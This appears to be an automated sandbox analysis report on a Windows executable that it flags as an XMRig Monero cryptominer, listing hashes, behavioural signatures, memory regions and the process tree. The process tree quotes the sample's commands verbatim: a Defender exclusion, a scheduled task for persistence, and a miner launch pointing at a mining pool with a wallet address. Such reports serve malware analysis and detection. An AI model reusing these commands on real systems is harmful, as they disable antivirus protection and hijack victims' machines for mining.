Resubmissions

06/03/2024, 22:46

240306-2pzx2abc39 7

23/12/2022, 20:25

221223-y7mhwahb34 10

23/12/2022, 20:11

221223-yx8ncscc9x 10

23/12/2022, 20:03

221223-ys7v9sha97 10

Analysis

  • max time kernel
    85s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    23/12/2022, 20:03

General

  • Target

    896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe

  • Size

    2.1MB

  • MD5

    55a350a007f6943a7e09f4abfdfa6979

  • SHA1

    c94e84ddbb6f525cfa675791c7f2d9b36d28a3ef

  • SHA256

    896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80

  • SHA512

    707269690787a70980cfc2658592cef762503ce7228fdfa56f5d584552327d28e338cc877fb37b1414f451a9c05a05fe3e134bc0197563a266fd62ab539bdc16

  • SSDEEP

    49152:yMkkwgEEIRmnl1DVHYYhdxiUFZ4l7jl1nUI3gg+cnIFPsxdgyg:yDkfRX4UTDennUI3gvcIlRz

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 13 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
    "C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1212
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1640
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:524
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
        3⤵
        • Creates scheduled task(s)
        PID:1384
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:1228

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1212-87-0x000007FEFDD40000-0x000007FEFDD5F000-memory.dmp

    Filesize

    124KB

  • memory/1212-93-0x000007FEF8910000-0x000007FEF8981000-memory.dmp

    Filesize

    452KB

  • memory/1212-58-0x0000000077A60000-0x0000000077B5A000-memory.dmp

    Filesize

    1000KB

  • memory/1212-59-0x000007FEFE4C0000-0x000007FEFE55F000-memory.dmp

    Filesize

    636KB

  • memory/1212-60-0x0000000077940000-0x0000000077A5F000-memory.dmp

    Filesize

    1.1MB

  • memory/1212-61-0x000007FEFD9F0000-0x000007FEFDA5C000-memory.dmp

    Filesize

    432KB

  • memory/1212-62-0x000007FEFEB80000-0x000007FEFEBF1000-memory.dmp

    Filesize

    452KB

  • memory/1212-63-0x000007FEF6EF0000-0x000007FEF6FE7000-memory.dmp

    Filesize

    988KB

  • memory/1212-64-0x000007FEFEA30000-0x000007FEFEB0B000-memory.dmp

    Filesize

    876KB

  • memory/1212-65-0x000007FEF62C0000-0x000007FEF6CAC000-memory.dmp

    Filesize

    9.9MB

  • memory/1212-66-0x0000000000D30000-0x0000000000FB6000-memory.dmp

    Filesize

    2.5MB

  • memory/1212-67-0x0000000000500000-0x0000000000541000-memory.dmp

    Filesize

    260KB

  • memory/1212-68-0x000007FEFE0E0000-0x000007FEFE20D000-memory.dmp

    Filesize

    1.2MB

  • memory/1212-69-0x000007FEFE820000-0x000007FEFEA23000-memory.dmp

    Filesize

    2.0MB

  • memory/1212-70-0x000007FEFC1A0000-0x000007FEFC1F6000-memory.dmp

    Filesize

    344KB

  • memory/1212-71-0x0000000000D30000-0x0000000000FB6000-memory.dmp

    Filesize

    2.5MB

  • memory/1212-72-0x000007FEF6DC0000-0x000007FEF6EEC000-memory.dmp

    Filesize

    1.2MB

  • memory/1212-73-0x000007FEFD2F0000-0x000007FEFD312000-memory.dmp

    Filesize

    136KB

  • memory/1212-89-0x000007FEF1820000-0x000007FEF183C000-memory.dmp

    Filesize

    112KB

  • memory/1212-98-0x0000000000500000-0x0000000000541000-memory.dmp

    Filesize

    260KB

  • memory/1212-76-0x000007FEFDE00000-0x000007FEFDED7000-memory.dmp

    Filesize

    860KB

  • memory/1212-97-0x000007FEFCFC0000-0x000007FEFD01B000-memory.dmp

    Filesize

    364KB

  • memory/1212-96-0x000007FEFDB80000-0x000007FEFDBB6000-memory.dmp

    Filesize

    216KB

  • memory/1212-95-0x000007FEFB280000-0x000007FEFB2A7000-memory.dmp

    Filesize

    156KB

  • memory/1212-94-0x000007FEFD770000-0x000007FEFD795000-memory.dmp

    Filesize

    148KB

  • memory/1212-88-0x000007FEFD1A0000-0x000007FEFD1B7000-memory.dmp

    Filesize

    92KB

  • memory/1212-92-0x000007FEF88A0000-0x000007FEF8904000-memory.dmp

    Filesize

    400KB

  • memory/1212-56-0x000007FEF71C0000-0x000007FEF725C000-memory.dmp

    Filesize

    624KB

  • memory/1212-91-0x000007FEFE6F0000-0x000007FEFE73D000-memory.dmp

    Filesize

    308KB

  • memory/1212-85-0x000007FEFBF20000-0x000007FEFC135000-memory.dmp

    Filesize

    2.1MB

  • memory/1212-57-0x000007FEFEB10000-0x000007FEFEB77000-memory.dmp

    Filesize

    412KB

  • memory/1212-55-0x000007FEF7260000-0x000007FEF72CF000-memory.dmp

    Filesize

    444KB

  • memory/1212-90-0x000007FEF1840000-0x000007FEF18A2000-memory.dmp

    Filesize

    392KB

  • memory/1228-109-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1228-121-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1228-127-0x0000000000000000-0x0000000001000000-memory.dmp

    Filesize

    16.0MB

  • memory/1228-126-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1228-125-0x0000000000000000-0x0000000001000000-memory.dmp

    Filesize

    16.0MB

  • memory/1228-124-0x0000000000000000-0x0000000001000000-memory.dmp

    Filesize

    16.0MB

  • memory/1228-123-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1228-122-0x00000000000E0000-0x0000000000100000-memory.dmp

    Filesize

    128KB

  • memory/1228-111-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1228-99-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1228-100-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1228-102-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1228-104-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1228-106-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1228-108-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1228-116-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1228-113-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1228-114-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1228-118-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

  • memory/1640-75-0x000007FEFC581000-0x000007FEFC583000-memory.dmp

    Filesize

    8KB

  • memory/1640-77-0x000007FEECA90000-0x000007FEED4B3000-memory.dmp

    Filesize

    10.1MB

  • memory/1640-79-0x00000000024C4000-0x00000000024C7000-memory.dmp

    Filesize

    12KB

  • memory/1640-78-0x000007FEEBF30000-0x000007FEECA8D000-memory.dmp

    Filesize

    11.4MB

  • memory/1640-80-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

    Filesize

    3.0MB

  • memory/1640-81-0x00000000024C4000-0x00000000024C7000-memory.dmp

    Filesize

    12KB

  • memory/1640-82-0x00000000024CB000-0x00000000024EA000-memory.dmp

    Filesize

    124KB